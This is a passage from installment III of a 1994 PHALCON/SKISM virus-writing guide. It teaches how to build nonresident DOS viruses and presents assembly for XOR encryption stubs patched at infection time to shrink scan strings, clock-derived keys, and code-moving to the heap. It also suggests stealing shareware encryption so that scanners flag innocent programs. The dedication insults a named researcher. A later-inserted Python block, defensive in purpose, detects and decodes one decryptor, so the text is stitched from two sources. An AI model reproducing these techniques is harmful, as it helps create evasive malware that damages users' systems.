PS_VIR3.TXT | Text File | 1994-07-17 | 20KB | 445 lines
[ASCII-art logo: PHALCON / SKISM]
───────────────────────────────────────────────
DISCLAIMER: I hereby claim to have written this
file.
───────────────────────────────────────────────
DEDICATION: This is dedicated to Patty Hoffman,
that fat bitch who doesn't know her own name,
and to the millions of dumb fools who were so
scared by Michelangelo that they didn't touch
their computers for an entire day.
───────────────────────────────────────────────
GREETS: to all PHALCON/SKISM members especially
Garbageheap, Hellraiser, and Demogorgon.
───────────────────────────────────────────────
Dark Angel's Crunchy Virus Writing Guide
──── ─────── ─────── ───── ─────── ─────
"It's the right thing to do"
────────────────────────────────────────────
INSTALLMENT III: NONRESIDENT VIRII, PART II
────────────────────────────────────────────
Welcome to the third installment of my Virus Writing Guide. In the
previous installment, I covered the primary part of the virus - the
replicator. As promised, I shall now cover the rest of the nonresident
virus and present code which, when combined with code from the previous
installment, will be sufficient to allow anyone to write a simple virus.
Additionally, I will present a few easy tricks and tips which can help
optimise your code.
─────────────
THE CONCEALER
─────────────
The concealer is the most common defense virus writers use to avoid
detection of virii. The most common encryption/decryption routine by far
is the XOR, since it may be used for both encryption and decryption.
encrypt_val     dw      ?               ; Should be somewhere in decrypted area

decrypt:
encrypt:
        mov     dx, word ptr [bp+encrypt_val]
        mov     cx, (part_to_encrypt_end - part_to_encrypt_start + 1) / 2
        lea     si, [bp+part_to_encrypt_start]
        mov     di, si
xor_loop:
        lodsw
        xor     ax, dx
        stosw
        loop    xor_loop
The previous routine uses a simple XOR routine to encrypt or decrypt code
in memory. This is essentially the same routine as the one in the first
installment, except it encrypts words rather than bytes. It therefore has
65,535 mutations as opposed to 255 and is also twice as fast. While this
routine is simple to understand, it leaves much to be desired as it is
large and therefore is almost begging to be a scan string. A better method
follows:
encrypt_val     dw      ?

decrypt:
encrypt:
        mov     dx, word ptr [bp+encrypt_val]
        lea     bx, [bp+part_to_encrypt_start]
        mov     cx, (part_to_encrypt_end - part_to_encrypt_start + 1) / 2
xor_loop:
        xor     word ptr [bx], dx
        add     bx, 2
        loop    xor_loop
Although this code is much shorter, it is possible to further reduce its
size. The best method is to insert the values for the encryption value,
BX, and CX, in at infection-time.
decrypt:
encrypt:
        mov     bx, 0FFFFh
        mov     cx, 0FFFFh
xor_loop:
        xor     word ptr [bx], 0FFFFh
        add     bx, 2
        loop    xor_loop
All the values denoted by 0FFFFh may be changed upon infection to values
appropriate for the infected file. For example, BX should be loaded with
the offset of part_to_encrypt_start relative to the start of the infected
file when the encryption routine is written to the infected file.
The primary advantage of the code used above is the minimisation of scan
code length. The scan code can only consist of those portions of the code
which remain constant. In this case, there are only three or four
consecutive bytes which remain constant. Since the entire encryption routine
consists of only about a dozen bytes, the size of the scan code is extremely
tiny.
Although the function of the encryption routine is clear, perhaps the
initial encryption value and calculation of subsequent values is not as
lucid. The initial value for most XOR encryptions should be 0. You should
change the encryption value during the infection process. A random
encryption value is desired. The simplest method of obtaining a random
number is to consult the internal clock. A random number may be easily
obtained with a simple:
        mov     ah, 2Ch                         ; Get me a random number.
        int     21h
        mov     word ptr [bp+encrypt_val], dx   ; Can also use CX
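The scan-string argument above cuts both ways: the immediates change per infection, but the opcode bytes around them do not, and the key itself sits inside the stub. The following is an added, defender-side example written for this page (it is not the author's code and not part of the original file). It builds a wildcard signature from the 8086 encoding of the third decryptor shown above (mov bx,imm16 / mov cx,imm16 / xor word ptr [bx],imm16 / add bx,2 / loop), locates the stub in a buffer, reads the patched immediates back out, and undoes the XOR on the region they select so the body can be inspected in the clear. It assumes a COM image loaded at CS:0100h; the sample image is constructed for the example and is not a real file.

```python
import struct

# Opcode bytes of the 16-bit decryptor in the text whose immediates are
# patched at infection time (8086 encoding; the same bytes an assembler emits):
#   mov bx, imm16             BB ii ii
#   mov cx, imm16             B9 ii ii
# xor_loop:
#   xor word ptr [bx], imm16  81 37 ii ii
#   add bx, 2                 83 C3 02
#   loop xor_loop             E2 F7      (rel8 = -9, back to xor_loop)
# None marks a wildcard: the immediates differ per infection, the rest does not.
DECRYPTOR_SIGNATURE = [
    0xBB, None, None,
    0xB9, None, None,
    0x81, 0x37, None, None,
    0x83, 0xC3, 0x02,
    0xE2, 0xF7,
]
STUB_LEN = len(DECRYPTOR_SIGNATURE)   # 15 bytes
COM_LOAD_OFFSET = 0x100               # a COM file is loaded at CS:0100h


def find_signature(buf, sig=DECRYPTOR_SIGNATURE):
    """Return every offset in buf at which the wildcard signature matches."""
    hits = []
    for off in range(len(buf) - len(sig) + 1):
        if all(s is None or buf[off + i] == s for i, s in enumerate(sig)):
            hits.append(off)
    return hits


def parse_stub(buf, off):
    """Read the three little-endian immediates out of a matched stub."""
    return {
        "start": struct.unpack_from("<H", buf, off + 1)[0],  # mov bx, imm16
        "words": struct.unpack_from("<H", buf, off + 4)[0],  # mov cx, imm16
        "key":   struct.unpack_from("<H", buf, off + 8)[0],  # xor [bx], imm16
    }


def xor_words(data, key):
    """Word-wise XOR with a 16-bit key, the operation the loop performs.

    XOR is its own inverse, so the same call encodes and decodes; a trailing
    odd byte is left untouched, as the loop's word count would leave it.
    """
    out = bytearray(data)
    for i in range(0, len(out) - 1, 2):
        struct.pack_into("<H", out, i, struct.unpack_from("<H", out, i)[0] ^ key)
    return bytes(out)


def decode_body(image, load_offset=COM_LOAD_OFFSET):
    """Locate the stub, then undo the XOR on the region its immediates select.

    Returns (stub_offset, decoded_bytes), or None when no stub matches or the
    immediates point outside the image (a malformed or unrelated match).
    """
    hits = find_signature(image)
    if not hits:
        return None
    off = hits[0]
    imm = parse_stub(image, off)
    body_off = imm["start"] - load_offset
    body_len = imm["words"] * 2
    if body_off < 0 or body_off + body_len > len(image):
        return None
    return off, xor_words(image[body_off:body_off + body_len], imm["key"])


# Constructed sample image (not a real file): the stub at image offset 0 with
# BX = 010Fh (first byte after the 15-byte stub), CX = 8 words, key = 5A3Ch,
# followed by a 16-byte body XOR-encoded under that key.
SAMPLE_BODY = b"CONSTRUCTED BODY"
SAMPLE_IMAGE = (
    bytes([0xBB, 0x0F, 0x01,          # mov bx, 010Fh
           0xB9, 0x08, 0x00,          # mov cx, 8
           0x81, 0x37, 0x3C, 0x5A,    # xor word ptr [bx], 5A3Ch
           0x83, 0xC3, 0x02,          # add bx, 2
           0xE2, 0xF7])               # loop xor_loop
    + xor_words(SAMPLE_BODY, 0x5A3C)
)

if __name__ == "__main__":
    print("stub offsets:", find_signature(SAMPLE_IMAGE))
    print("immediates:", parse_stub(SAMPLE_IMAGE, 0))
    print("decoded:", decode_body(SAMPLE_IMAGE))
```

The point for a scanner is that the wildcarded immediates cost nothing: every infection, whatever clock-derived key it was given, still carries the same eleven fixed bytes, and once the stub is found the key is read straight out of it, so the body behind it can be matched against ordinary signatures. The limitation is equally visible: the signature is tied to this exact instruction sequence, which is why scanners of the period moved from fixed byte patterns toward emulating the decryptor loop rather than pattern-matching it.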
Some encryption functions do not facilitate an initial value of 0. For an
example, take a look at Whale. It uses the value of the previous word as
an encryption value. In these cases, simply use a JMP to skip past the
decryption routine when coding the virus. However, make sure infections
JMP to the right location! For example, this is how you would code such a
virus:
        org     100h
start:
        jmp     past_encryption
        ; Insert your encryption routine here
past_encryption:
The encryption routine is the ONLY part of the virus which needs to be
unencrypted. Through code-moving techniques, it is possible to copy the
infection mechanism to the heap (memory location past the end of the file
and before the stack). All that is required is a few MOVSW instructions
and one JMP. First the encryption routine must be copied, then the
writing, then the decryption, then the RETurn back to the program. For
example:
        lea     si, [bp+encryption_routine]
        lea     di, [bp+heap]
        mov     cx, encryption_routine_size
        push    si
        push    cx
        rep     movsb
        lea     si, [bp+writing_routine]
        mov     cx, writing_routine_size
        rep     movsb
        pop     cx
        pop     si
        rep     movsb
        mov     al, 0C3h                ; Tack on a near return
        stosb
        call    [bp+heap]
Although most virii, for simplicity's sake, use the same routine for both
encryption and decryption, the above code shows this is completely
unnecessary. The only modification of the above code for inclusion of a
separate decryption routine is to take out the PUSHes and replace the POPs
with the appropriate LEA si and MOV cx.
Original encryption routines, while interesting, might not be the best.
Stolen encryption routines are the best, especially those stolen from
encrypted shareware programs! Sydex is notorious for using encryption in
their shareware programs. Take a look at a shareware program's puny
encryption and feel free to copy it into your own. Hopefully, the anti-viral
developers will create a scan string which will detect infection by
your virus in shareware products simply because the encryption is the same.
Note that this is not a full treatment of concealment routines. A full
text file could be written on encryption/decryption techniques alone. This
is only the simplest of all possible encryption techniques and there are
far more concealment techniques available. However, for the beginner, it
should suffice.
──────────────
THE DISPATCHER
──────────────
The dispatcher is the portion of the virus which restores control back to
the infected program. The dispatchers for EXE and COM files are,
naturally, different.
In COM files, you must restore the bytes which were overwritten by your
virus and then